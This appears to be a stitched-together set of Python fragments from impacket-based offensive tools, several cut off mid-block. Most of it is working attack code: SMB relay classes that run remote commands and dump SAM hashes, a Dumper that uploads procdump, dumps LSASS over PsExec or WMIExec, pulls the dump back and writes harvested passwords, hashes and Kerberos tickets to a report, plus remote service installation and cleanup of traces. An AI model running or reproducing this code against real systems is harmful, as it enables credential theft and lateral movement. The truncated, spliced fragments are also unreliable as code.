class SMBAttack(Thread):
def __init__(self, config, SMBClient, exeFile, command):
Thread.__init__(self)
self.daemon = True
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.config = config
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = ''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
finally:
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = ''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
print self.__answerTMP
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
finally:
def delete(target, path, share="c$"):
username, password, domain, nthash = target.creds
lmhash = "" if password else "aad3b435b51404eeaad3b435b51404ee"
try:
smb = SMBConnection(remoteName='*SMBSERVER',
remoteHost=target.target_ip,
sess_port=target.target_port)
smb.login(username, password, domain, lmhash, nthash)
smb.deleteFile(share, path)
return True
except Exception as e:
print(str(e))
return False
class doAttack():
# class doAttack(Thread):
def __init__(self, SMBClient, command):
# Thread.__init__(self)
self.__SMBConnection = SMBConnection(existingConnection=SMBClient)
self.__command = command
self.__answerTMP = ''
def __answer(self, data):
self.__answerTMP += data
def run(self):
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
# Something wen't wrong, most probably we don't have access as admin. aborting
print(str(e))
return False
try:
remoteOps._RemoteOperations__executeRemote(self.__command)
# print("Executed specified command on host: %s" % self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output',
self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
except Exception as e:
print(str(e))
self.__answerTMP = 'ERROR'
finally:
if remoteOps is not None:
remoteOps.finish()
return self.__answerTMP
class SMBAttack(ProtocolAttack):
"""
This is the SMB default attack class.
It will either dump the hashes from the remote target, or open an interactive
shell if the -i option is specified.
"""
PLUGIN_NAMES = ["SMB"]
def __init__(self, config, SMBClient, username):
ProtocolAttack.__init__(self, config, SMBClient, username)
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection=SMBClient)
else:
self.__SMBConnection = SMBClient
self.__answerTMP = ''
if self.config.interactive:
#Launch locally listening interactive shell
self.tcpshell = TcpShell()
else:
self.tcpshell = None
if self.config.exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
LOG.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
LOG.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
if self.__SMBConnection.getDialect() == smb.SMB_DIALECT:
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
# Something went wrong, most probably we don't have access as admin. aborting
LOG.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
print self.__answerTMP.decode(self.config.encoding, 'replace')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
LOG.error(str(e))
finally:
class SMBAttack(ProtocolAttack):
"""
This is the SMB default attack class.
It will either dump the hashes from the remote target, or open an interactive
shell if the -i option is specified.
"""
PLUGIN_NAMES = ["SMB"]
def __init__(self, config, SMBClient, username):
ProtocolAttack.__init__(self, config, SMBClient, username)
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection=SMBClient)
else:
self.__SMBConnection = SMBClient
self.__answerTMP = bytearray()
if self.config.interactive:
#Launch locally listening interactive shell
self.tcpshell = TcpShell()
else:
self.tcpshell = None
if self.config.exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
LOG.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection, self.tcpshell)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
LOG.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
from impacket.examples.ntlmrelayx.utils.enum import EnumLocalAdmins
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
if self.__SMBConnection.getDialect() == smb.SMB_DIALECT:
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
if "rpc_s_access_denied" in str(e): # user doesn't have correct privileges
if self.config.enumLocalAdmins:
LOG.info("Relayed user doesn't have admin on {}. Attempting to enumerate users who do...".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection)
try:
localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins()
LOG.info("Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
for name in localAdminNames:
LOG.info("Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name))
except DCERPCException:
LOG.info("SAMR access denied")
return
# Something else went wrong. aborting
LOG.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
print(self.__answerTMP.decode(self.config.encoding, 'replace'))
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
LOG.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
class Dumper:
def __init__(self, username, password, domain, target, auth, hashes):
self.target = target
self.auth = auth
if domain is None:
domain = ""
self.credentials = {
"username": username,
"password": password,
"domain": domain,
"hashes": hashes,
}
if self.credentials["hashes"] != "":
self.credentials["hashes"] = self.credentials["hashes"].lower()
self.credentials["lm_hash"] = self.credentials["hashes"].split(
":")[0]
self.credentials["nt_hash"] = self.credentials["hashes"].split(
":")[1]
else:
self.credentials["hashes"] = None
self.credentials["lm_hash"] = ""
self.credentials["nt_hash"] = ""
self.smb = SMBConnection(self.target,
self.target,
sess_port=445,
timeout=4)
self.host_info = self.enum_host_info()
def enum_host_info(self):
print("Performing enumeration")
info_dict = {}
self.smb.login(
user=self.credentials["username"],
password=self.credentials["password"],
domain=self.credentials["domain"],
nthash=self.credentials["nt_hash"],
lmhash=self.credentials["lm_hash"],
)
os = self.smb.getServerOS()
arch = self.get_arch()
domain = self.smb.getServerDomain()
info_dict.update({"target": self.target})
info_dict.update({"os": os})
info_dict.update({"domain": domain})
info_dict.update({"arch": arch})
print("Done")
return info_dict
def get_arch(self):
options = Namespace()
options.target = self.target
NDR64Syntax = ("71710533-BEBA-4937-8319-B5DBEF9CCC36", "1.0")
try:
stringBinding = r"ncacn_ip_tcp:%s[135]" % self.target
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(2)
dce = transport.get_dce_rpc()
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=NDR64Syntax)
except DCERPCException as e:
if str(e).find("syntaxes_not_supported") >= 0:
return 32
else:
print(str(e))
pass
else:
return 64
dce.disconnect()
except Exception as e:
print(f"{self.target}, {str(e)}")
print(f"Failed to determine {self.target} architecture")
print("Attempt to proceed with 32 bit procdump")
return 32
def upload_file(self):
print("Uploading file")
if self.host_info["arch"] == 64:
src = src_x64
filename = re.sub(r"\d+", "", path.basename(src))
self.smb.putFile("C$", "/Users/Public/Documents/" + filename,
open(src, "rb").read)
elif self.host_info["arch"] == 32:
src = src_x32
filename = re.sub(r"\d+", "", path.basename(src))
self.smb.putFile("C$", "/Users/Public/Documents/" + filename,
open(src, "rb").read)
else:
print("Something went wrong")
sys.exit(1)
print("Done")
def exec_procdump(self):
print("Executing procdump")
if self.credentials["password"] != "":
password = self.credentials["password"]
else:
password = ""
if self.auth == "psexec":
executer = PSEXEC(
"C:\\Users\\Public\\Documents\\procdump.exe -accepteula > nul",
None,
None,
None,
int(445),
self.credentials["username"],
password,
self.credentials["domain"],
self.credentials["hashes"],
None,
False,
None,
"",
).run(self.target, self.target)
if self.host_info["arch"] == 64:
executer = PSEXEC(
"C:\\Users\\Public\\Documents\\procdump.exe -ma -64 lsass.exe C:\\Users\\Public\\Documents\\lsass_dump",
None,
None,
None,
int(445),
self.credentials["username"],
password,
self.credentials["domain"],
self.credentials["hashes"],
None,
False,
None,
"",
)
else:
executer = PSEXEC(
"C:\\Users\\Public\\Documents\\procdump.exe -ma lsass.exe C:\\Users\\Public\\Documents\\lsass_dump",
None,
None,
None,
int(445),
self.credentials["username"],
password,
self.credentials["domain"],
self.credentials["hashes"],
None,
False,
None,
"",
)
executer.run(remoteName=self.target, remoteHost=self.target)
elif self.auth == "wmiexec":
executer = WMIEXEC(
command=
"C:\\Users\\Public\\Documents\\procdump.exe -accepteula > nul",
username=self.credentials["username"],
password=password,
domain=self.credentials["domain"],
hashes=self.credentials["hashes"],
aesKey=None,
share="C$",
noOutput=False,
doKerberos=False,
kdcHost=None,
).run(self.target)
if self.host_info["arch"] == 64:
executer = WMIEXEC(
command=
"C:\\Users\\Public\\Documents\\procdump.exe -ma -64 lsass.exe C:\\Users\\Public\\Documents\\lsass_dump",
username=self.credentials["username"],
password=password,
domain=self.credentials["domain"],
hashes=self.credentials["hashes"],
aesKey=None,
share="C$",
noOutput=False,
doKerberos=False,
kdcHost=None,
)
else:
executer = WMIEXEC(
command=
"C:\\Users\\Public\\Documents\\procdump.exe -ma -64 lsass.exe C:\\Users\\Public\\Documents\\lsass_dump",
username=self.credentials["username"],
password=password,
domain=self.credentials["domain"],
hashes=self.credentials["hashes"],
aesKey=None,
share="C$",
noOutput=False,
doKerberos=False,
kdcHost=None,
)
executer.run(self.target)
print("Done")
def dump_lsass(self):
print("Dumping")
self.smb.getFile(
"C$",
"/Users/Public/Documents/lsass_dump.dmp",
open("lsass_dump.dmp", "wb").write,
)
print("Done")
def clear_out(self):
print("Starting ClearOut")
self.smb.deleteFile("C$", "/Users/Public/Documents/lsass_dump.dmp")
self.smb.deleteFile("C$", "/Users/Public/Documents/procdump.exe")
self.smb.close()
print("ClearOut Done")
# def clean_up(self):
# print("Searching for files")
# if self.credentials["password"] != "":
# password = self.credentials["password"]
# else:
# password = ""
# if self.auth == "psexec":
# executer = PSEXEC(
# "dir C:\\Users\\Public\\Documents | ?{._name -match 'lsass_dump.*?.dmp$'}",
# None,
# None,
# None,
# int(445),
# self.credentials["username"],
# password,
# self.credentials["domain"],
# self.credentials["hashes"],
# None,
# False,
# None,
# "",
# ).run(self.target, self.target)
# elif self.auth == "wmiexec":
# executer = WMIEXEC(
# command="dir C:\\Users\\Public\\Documents | ?{._name -match 'lsass_dump.*?.dmp$'}",
# username=self.credentials["username"],
# password=password,
# domain=self.credentials["domain"],
# hashes=self.credentials["hashes"],
# aesKey=None,
# share="C$",
# noOutput=False,
# doKerberos=False,
# kdcHost=None,
# ).run(self.target)
# # self.smb.login(
# # user=self.credentials["username"],
# # password=self.credentials["password"],
# # domain=self.credentials["domain"],
# # nthash=self.credentials["nt_hash"],
# # lmhash=self.credentials["lm_hash"],
# # )
#
# pdb.set_trace()
@staticmethod
def dump_to_pypykatz(dump_file="./lsass_dump.dmp"):
print("Pypykatz doing his job...")
cmdhelpers = [
LSACMDHelper(),
RegistryCMDHelper(),
CryptoCMDHelper(),
LDAPCMDHelper(),
KerberosCMDHelper(),
RemoteCMDHelper(),
]
args = Namespace()
args.cmd = "minidump"
args.command = "lsa"
args.directory = False
args.halt_on_error = False
args.json = True
args.kerberos_dir = False
args.memoryfile = dump_file
args.outfile = "temp_report.json"
args.recursive = False
args.timestamp_override = None
args.verbose = 0
for helper in cmdhelpers:
helper.execute(args)
print("Removing dump file")
os.remove(dump_file)
print("Done")
@staticmethod
def create_report(filename, verbose):
print("Creating report")
with open("./temp_report.json", "r") as jf:
parsed = json.load(jf)["./lsass_dump.dmp"]
with open(filename, "w") as report:
for el in parsed["logon_sessions"]:
temp = parsed["logon_sessions"][el]
if len(temp["kerberos_creds"]) > 0:
for cr in temp["kerberos_creds"]:
if cr["username"] is not None:
if cr["password"] is not None:
if verbose == 1:
report.write(
f"From Kerberos (Domain/username:password) -- {cr['domainname']} / {cr['username']}:{cr['password']}\n"
)
else:
report.write(
f"{cr['domainname']} / {cr['username']}:{cr['password']}\n"
)
elif len(cr["tickets"]) > 0:
if verbose == 1:
report.write(
f"From Kerberos (Domain/username:tickets) -- {cr['domainname']} / {cr['username']}:{cr['tickets']}\n"
)
else:
report.write(
f"Tickets--{cr['domainname']} / {cr['username']}:{cr['tickets']}\n"
)
if len(temp["livessp_creds"]) > 0:
report.write("Did not expect creds to be in livessp\n")
if len(temp["ssp_creds"]) > 0:
for cr in temp["ssp_creds"]:
if cr["username"] is not None:
if cr["password"] is not None:
if verbose == 1:
report.write(
f"From SSP (Domain/username:password) -- {cr['domainname']}/{cr['username']}:{cr['password']}\n"
)
else:
report.write(
f"{cr['domainname']}/{cr['username']}:{cr['password']}\n"
)
if len(temp["wdigest_creds"]) > 0:
for cr in temp["wdigest_creds"]:
if cr["username"] is not None:
if cr["password"] is not None:
if verbose == 1:
report.write(
f"From Wdigest (Domain/username:password) -- {cr['domainname']} / {cr['username']}:{cr['password']}\n"
)
else:
report.write(
f"{cr['domainname']} / {cr['username']}:{cr['password']}\n"
)
if len(temp["msv_creds"]) > 0:
for cr in temp["msv_creds"]:
if cr["username"] is not None:
if cr["NThash"] is not None:
if verbose == 1:
report.write(
f"From MSV (Domain/username:NThash) -- {cr['domainname']} / {cr['username']}:{cr['NThash']}\n"
)
else:
report.write(
f"NTHASH--{cr['domainname']} / {cr['username']}:{cr['NThash']}\n"
)
for el in parsed["orphaned_creds"]:
if "username" in el.keys() and el["username"] is not "":
if el["password"] is not None:
if verbose == 1:
report.write(
f"From orphaned creds (Domain/username:password) -- {el['domainname']} / {el['username']}:{el['password']}\n"
)
else:
report.write(
f"{el['domainname']} / {el['username']}:{el['password']}\n"
)
elif "tickets" in el.keys() and len(el["tickets"]) > 0:
if verbose == 1:
report.write(
f"From orphaned creds (Domain/username:tickets) -- {el['domainname']} / {el['username']}:{el['tickets']}\n"
)
else:
report.write(
f"Tickets--{el['domainname']} / {el['username']}:{el['tickets']}\n"
)
os.remove("./temp_report.json")
print("Done :)")
def run(self):
self.upload_file()
self.exec_procdump()
self.dump_lsass()
self.clear_out()
class ServiceInstall:
def __init__(self, SMBObject, exeFile, serviceName=''):
self._rpctransport = 0
self.__service_name = serviceName if len(serviceName) > 0 else ''.join(
[random.choice(string.ascii_letters) for i in range(4)])
self.__binary_service_name = ''.join(
[random.choice(string.ascii_letters) for i in range(8)]) + '.exe'
self.__exeFile = exeFile
# We might receive two different types of objects, always end up
# with a SMBConnection one
if isinstance(SMBObject, smb.SMB) or isinstance(SMBObject, smb3.SMB3):
self.connection = SMBConnection(existingConnection=SMBObject)
else:
self.connection = SMBObject
self.share = ''
def getShare(self):
return self.share
def getShares(self):
# Setup up a DCE SMBTransport with the connection already in place
LOG.info("Requesting shares on %s....." %
(self.connection.getRemoteHost()))
try:
self._rpctransport = transport.SMBTransport(
self.connection.getRemoteHost(),
self.connection.getRemoteHost(),
filename=r'\srvsvc',
smb_connection=self.connection)
dce_srvs = self._rpctransport.get_dce_rpc()
dce_srvs.connect()
dce_srvs.bind(srvs.MSRPC_UUID_SRVS)
resp = srvs.hNetrShareEnum(dce_srvs, 1)
return resp['InfoStruct']['ShareInfo']['Level1']
except:
LOG.critical("Error requesting shares on %s, aborting....." %
(self.connection.getRemoteHost()))
raise
def createService(self, handle, share, path):
LOG.info("Creating service %s on %s....." %
(self.__service_name, self.connection.getRemoteHost()))
# First we try to open the service in case it exists. If it does, we remove it.
try:
resp = scmr.hROpenServiceW(self.rpcsvc, handle,
self.__service_name + '\x00')
except Exception as e:
if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') >= 0:
# We're good, pass the exception
pass
else:
raise e
else:
# It exists, remove it
scmr.hRDeleteService(self.rpcsvc, resp['lpServiceHandle'])
scmr.hRCloseServiceHandle(self.rpcsvc, resp['lpServiceHandle'])
# Create the service
command = '%s\\%s' % (path, self.__binary_service_name)
try:
resp = scmr.hRCreateServiceW(self.rpcsvc,
handle,
self.__service_name + '\x00',
self.__service_name + '\x00',
lpBinaryPathName=command + '\x00',
dwStartType=scmr.SERVICE_DEMAND_START)
except:
LOG.critical(
"Error creating service %s on %s" %
(self.__service_name, self.connection.getRemoteHost()))
raise
else:
return resp['lpServiceHandle']
def openSvcManager(self):
LOG.info("Opening SVCManager on %s....." %
self.connection.getRemoteHost())
# Setup up a DCE SMBTransport with the connection already in place
self._rpctransport = transport.SMBTransport(
self.connection.getRemoteHost(),
self.connection.getRemoteHost(),
filename=r'\svcctl',
smb_connection=self.connection)
self.rpcsvc = self._rpctransport.get_dce_rpc()
self.rpcsvc.connect()
self.rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
try:
resp = scmr.hROpenSCManagerW(self.rpcsvc)
except:
LOG.critical("Error opening SVCManager on %s....." %
self.connection.getRemoteHost())
raise Exception('Unable to open SVCManager')
else:
return resp['lpScHandle']
def copy_file(self, src, tree, dst):
LOG.info("Uploading file %s" % dst)
if isinstance(src, str):
# We have a filename
fh = open(src, 'rb')
else:
# We have a class instance, it must have a read method
fh = src
f = dst
pathname = f.replace('/', '\\')
try:
self.connection.putFile(tree, pathname, fh.read)
except:
LOG.critical("Error uploading file %s, aborting....." % dst)
raise
fh.close()
def findWritableShare(self, shares):
# Check we can write a file on the shares, stop in the first one
writeableShare = None
for i in shares['Buffer']:
if i['shi1_type'] == srvs.STYPE_DISKTREE or i[
'shi1_type'] == srvs.STYPE_SPECIAL:
share = i['shi1_netname'][:-1]
tid = 0
try:
tid = self.connection.connectTree(share)
self.connection.openFile(
tid,
'\\',
FILE_WRITE_DATA,
creationOption=FILE_DIRECTORY_FILE)
except:
LOG.debug('Exception', exc_info=True)
LOG.critical("share '%s' is not writable." % share)
pass
else:
LOG.info('Found writable share %s' % share)
writeableShare = str(share)
break
finally:
if tid != 0:
self.connection.disconnectTree(tid)
return writeableShare
def install(self):
if self.connection.isGuestSession():
LOG.critical("Authenticated as Guest. Aborting")
self.connection.logoff()
del self.connection
else:
fileCopied = False
serviceCreated = False
# Do the stuff here
try:
# Let's get the shares
shares = self.getShares()
self.share = self.findWritableShare(shares)
if self.share is None:
return False
self.copy_file(self.__exeFile, self.share,
self.__binary_service_name)
fileCopied = True
svcManager = self.openSvcManager()
if svcManager != 0:
serverName = self.connection.getServerName()
if self.share.lower() == 'admin$':
path = '%systemroot%'
else:
if serverName != '':
path = '\\\\%s\\%s' % (serverName, self.share)
else:
path = '\\\\127.0.0.1\\' + self.share
service = self.createService(svcManager, self.share, path)
serviceCreated = True
if service != 0:
# Start service
LOG.info('Starting service %s.....' %
self.__service_name)
try:
scmr.hRStartServiceW(self.rpcsvc, service)
except:
pass
scmr.hRCloseServiceHandle(self.rpcsvc, service)
scmr.hRCloseServiceHandle(self.rpcsvc, svcManager)
return True
except Exception as e:
LOG.critical(
"Error performing the installation, cleaning up: %s" % e)
LOG.debug("Exception", exc_info=True)
try:
scmr.hRControlService(self.rpcsvc, service,
scmr.SERVICE_CONTROL_STOP)
except:
pass
if fileCopied is True:
try:
self.connection.deleteFile(self.share,
self.__binary_service_name)
except:
pass
if serviceCreated is True:
try:
scmr.hRDeleteService(self.rpcsvc, service)
except:
pass
return False
def uninstall(self):
fileCopied = True
serviceCreated = True
# Do the stuff here
try:
# Let's get the shares
svcManager = self.openSvcManager()
if svcManager != 0:
resp = scmr.hROpenServiceW(self.rpcsvc, svcManager,
self.__service_name + '\x00')
service = resp['lpServiceHandle']
LOG.info('Stopping service %s.....' % self.__service_name)
try:
scmr.hRControlService(self.rpcsvc, service,
scmr.SERVICE_CONTROL_STOP)
except:
pass
LOG.info('Removing service %s.....' % self.__service_name)
scmr.hRDeleteService(self.rpcsvc, service)
scmr.hRCloseServiceHandle(self.rpcsvc, service)
scmr.hRCloseServiceHandle(self.rpcsvc, svcManager)
LOG.info('Removing file %s.....' % self.__binary_service_name)
self.connection.deleteFile(self.share, self.__binary_service_name)
except Exception:
LOG.critical("Error performing the uninstallation, cleaning up")
try:
scmr.hRControlService(self.rpcsvc, service,
scmr.SERVICE_CONTROL_STOP)
except:
pass
if fileCopied is True:
try:
self.connection.deleteFile(self.share,
self.__binary_service_name)
except:
try:
self.connection.deleteFile(self.share,
self.__binary_service_name)
except:
pass
pass
if serviceCreated is True:
try:
scmr.hRDeleteService(self.rpcsvc, service)
except:
pass
class SMBShell(PsExec, Samr, SvcCtl):
def __init__(self, target, credential, local_name):
self.__dstip = target.get_host()
self.__dstport = target.get_port()
self.__user = credential.get_user()
self.__password = credential.get_password()
self.__lmhash = credential.get_lm_hash()
self.__nthash = credential.get_nt_hash()
self.__domain = credential.get_domain()
self.__is_admin = credential.get_is_admin()
self.__srcfile = local_name
self.__destfile = '*SMBSERVER' if self.__dstport == 139 else self.__dstip
self.__timeout = 5 * 60
self.smb = None
self.tid = None
self.pwd = '\\'
self.share = ''
self.shares_list = []
self.domains_dict = {}
self.users_list = set()
self.completion = []
self.smbserver_share = ''.join(random.choice(string.ascii_uppercase) for _ in range(8))
self.connect()
logger.debug('Connection to host %s established' % target.get_identity())
self.login()
logger.debug(
'Logged in as %s' % (self.__user if not self.__domain else '%s\%s' % (self.__domain, self.__user)))
logger.info('Looking for a writable share, wait..')
_ = self.get_writable_share()
self.info(False)
if _:
DataStore.writable_share = _
else:
logger.warn('Unable to find a writable share. Going to use %s, but some commands will not work'
% DataStore.writable_share)
if DataStore.version_major >= 6 or (DataStore.version_major == 5 and DataStore.version_minor == 1):
DataStore.share_path = ntpath.join(DataStore.user_path, 'Windows', 'Temp')
else:
DataStore.share_path = ntpath.join(DataStore.user_path, 'WINNT', 'Temp')
def connect(self):
self.smb = SMBConnection(self.__destfile, self.__dstip, self.__srcfile, self.__dstport, self.__timeout)
def login(self):
try:
self.smb.login(self.__user, self.__password, self.__domain, self.__lmhash, self.__nthash)
except socket.error as e:
logger.warn('Connection to host %s failed (%s)' % (self.__dstip, e))
raise RuntimeError
except SessionError as e:
logger.error('SMB error: %s' % (e.getErrorString(),))
raise RuntimeError
def logoff(self):
self.smb.logoff()
def smb_transport(self, named_pipe):
self.trans = transport.SMBTransport(remoteName=self.__dstip, dstport=self.__dstport, filename=named_pipe,
smb_connection=self.smb, remote_host=self.__dstip)
try:
self.trans.connect()
except socket.error as e:
logger.warn('Connection to host %s failed (%s)' % (self.__dstip, e))
raise RuntimeError
except SessionError as e:
logger.warn('SMB error: %s' % e.getErrorString())
raise RuntimeError
def info(self, display=True):
self.smb_transport('srvsvc')
self.__dce = self.trans.get_dce_rpc()
self.__dce.bind(srvs.MSRPC_UUID_SRVS)
try:
self.__resp = srvs.hNetrServerGetInfo(self.__dce, 102)
except rpcrt.DCERPCException as _:
# traceback.print_exc()
logger.warning('Unable to query server information')
return None
self.__dce.disconnect()
DataStore.server_os = self.smb.getServerOS()
DataStore.server_name = self.smb.getServerName()
DataStore.server_domain = self.smb.getServerDomain()
DataStore.server_host = self.smb.getRemoteHost()
DataStore.user_path = self.__resp['InfoStruct']['ServerInfo102']['sv102_userpath']
DataStore.version_major = self.__resp['InfoStruct']['ServerInfo102']['sv102_version_major']
DataStore.version_minor = self.__resp['InfoStruct']['ServerInfo102']['sv102_version_minor']
if display:
print('Operating system: %s' % self.smb.getServerOS())
print('Netbios name: %s' % self.smb.getServerName())
print('Domain: %s' % self.smb.getServerDomain())
print('SMB dialect: %s' % check_dialect(self.smb.getDialect()))
print('NTLMv2 support: %s' % self.smb.doesSupportNTLMv2())
print('UserPath: %s' % DataStore.user_path)
print('Simultaneous users: %d' % self.__resp['InfoStruct']['ServerInfo102']['sv102_users'])
print('Version major: %d' % DataStore.version_major)
print('Version minor: %d' % DataStore.version_minor)
print('Comment: %s' % self.__resp['InfoStruct']['ServerInfo102']['sv102_comment'] or '')
# TODO: uncomment when SMBConnection will have a wrapper
# getServerTime() method for both SMBv1,2,3
# print 'Time: %s' % self.smb.get_server_time()
return self.__resp
def who(self):
self.smb_transport('srvsvc')
self.__dce = self.trans.get_dce_rpc()
self.__dce.connect()
self.__dce.bind(srvs.MSRPC_UUID_SRVS)
